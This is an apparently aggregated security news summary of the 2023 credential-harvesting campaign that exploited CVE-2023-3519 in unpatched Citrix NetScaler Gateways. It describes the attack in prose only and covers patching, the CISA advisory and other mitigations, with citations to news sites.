Hackers have been exploiting a critical vulnerability [2] [4], known as CVE-2023-3519 [1] [3] [4] [5], in unpatched Citrix NetScaler Gateways [2]. This flaw allows for remote code execution and has been used in a large-scale campaign to steal user credentials.
Description
By mid-August [4], at least 2,000 Citrix servers had been backdoored using this exploit [4]. The attackers insert a malicious script into the authentication web page’s HTML content [3] [5] [6], leading to the theft of user credentials. X-Force has identified over 600 unique victim IP addresses worldwide, primarily in the U.S. [1] [3] and Europe [1] [3], hosting modified NetScaler Gateway login pages [1] [6]. The attackers leverage the vulnerability to inject a PHP web shell and append custom HTML code to the legitimate ‘index.html’ file [6]. This causes the VPN authentication page to load a JavaScript file hosted on the attacker’s page [6], facilitating the harvesting of credentials. The stolen credentials are transmitted to the same URL via an HTTP POST request. The NetScaler Packet Processing Engine (NSPPE) crash files may contain evidence of exploiting the vulnerability [6].
Despite warnings to update Citrix devices [4], the attack surface remains significant [4], and hackers have been using CVE-2023-3519 to inject JavaScript that harvests login credentials since September [4]. To mitigate this issue, organizations are advised to promptly apply patches and change default login credentials for their devices. Additionally, the Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory document with recommendations for detection, incident response [6], mitigations [6], and testing security procedures [6], which organizations should follow. Patch Manager Plus can be used to quickly patch vulnerabilities.
The campaign has affected almost 600 unique IP addresses of NetScaler devices and has not been attributed to any known threat actor or group. It is important for administrators to patch immediately and check for signs of a breach [2]. Organizations should also implement strong security controls [2], such as multi-factor authentication and privileged access security [2], to protect against credential harvesting and abuse [2].
Conclusion
The exploitation of the CVE-2023-3519 vulnerability in unpatched Citrix NetScaler Gateways has had significant impacts, with thousands of servers being backdoored and user credentials being stolen. Prompt patching and changing default login credentials are crucial mitigations to prevent further attacks. The advisory document from CISA provides valuable guidance for organizations to enhance their detection, incident response [6], and security procedures [6]. Implementing strong security controls [2], like multi-factor authentication and privileged access security [2], is essential to protect against credential harvesting and abuse [2]. Administrators should remain vigilant and continuously monitor for signs of a breach.
References
[1] https://beker.uk/2023/10/10/citrix-devices-under-attack-netscaler-flaw-exploited-to-capture-user-credentials/
[2] https://www.scmagazine.com/news/attacks-on-netscaler-gateways-aim-for-user-credentials
[3] https://thehackernews.com/2023/10/citrix-devices-under-attack-netscaler.html
[4] https://www.redpacketsecurity.com/hackers-hijack-citrix-netscaler-login-pages-to-steal-credentials/
[5] https://www.cyberevive.com/2023/10/10/citrix-devices-under-attack-netscaler-flaw-exploited-to-capture-user-credentials/
[6] https://cybersecuritynews.com/hackers-exploiting-citrix-netscaler-vulnerability/
